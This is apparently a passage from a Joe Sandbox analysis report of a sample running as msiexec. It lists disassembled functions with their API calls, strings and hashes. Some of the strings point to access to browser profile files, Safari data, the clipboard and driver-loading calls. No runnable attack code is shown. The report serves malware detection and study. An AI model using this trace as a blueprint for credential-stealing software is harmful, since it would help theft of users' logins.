                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                    • free.MSVCRT ref: 00418370
                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                    • Opcode ID: 78d2135784b36f3903f9871ee7adf38e4db2590f8e5e3f290b233798c2ec08b4
                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                    • Opcode Fuzzy Hash: 78d2135784b36f3903f9871ee7adf38e4db2590f8e5e3f290b233798c2ec08b4
                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                    Function 0041183A Relevance: 3.0, APIs: 2, Instructions: 44clipboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                    • OpenClipboard.USER32(?), ref: 00411878
                                                                                                    • GetLastError.KERNEL32 ref: 0041188D
                                                                                                      • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                      • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                      • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                      • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                      • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                      • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                      • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                      • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                      • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2628231878-0
                                                                                                    • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                    • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                    • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                    • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                    Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1865533344-0
                                                                                                    • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                    • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                    Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Version
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889659487-0
                                                                                                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                    • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                    Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NtdllProc_Window
                                                                                                    • String ID:
                                                                                                    • API String ID: 4255912815-0
                                                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                    Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                    • API String ID: 577499730-1134094380
                                                                                                    • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                    • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                    Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                    • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                    • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                    Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                    • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                    • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                    Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                    • memset.MSVCRT ref: 00413292
                                                                                                    • memset.MSVCRT ref: 004132B4
                                                                                                    • memset.MSVCRT ref: 004132CD
                                                                                                    • memset.MSVCRT ref: 004132E1
                                                                                                    • memset.MSVCRT ref: 004132FB
                                                                                                    • memset.MSVCRT ref: 00413310
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                    • memset.MSVCRT ref: 004133C0
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                    Strings
                                                                                                    • {Unknown}, xrefs: 004132A6
                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                    • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                    • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                    Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 829165378-0
                                                                                                    • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                    • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                    Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                                                    • memset.MSVCRT ref: 00404200
                                                                                                    • memset.MSVCRT ref: 00404215
                                                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 0040426E
                                                                                                    • memset.MSVCRT ref: 004042CD
                                                                                                    • memset.MSVCRT ref: 004042E2
                                                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                    • API String ID: 2454223109-1580313836
                                                                                                    • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                    • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                    Function 0041352F Relevance: 33.3, APIs: 9, Strings: 10, Instructions: 41libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+8w@F8w@B8w
                                                                                                    • API String ID: 667068680-4123708296
                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                    Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
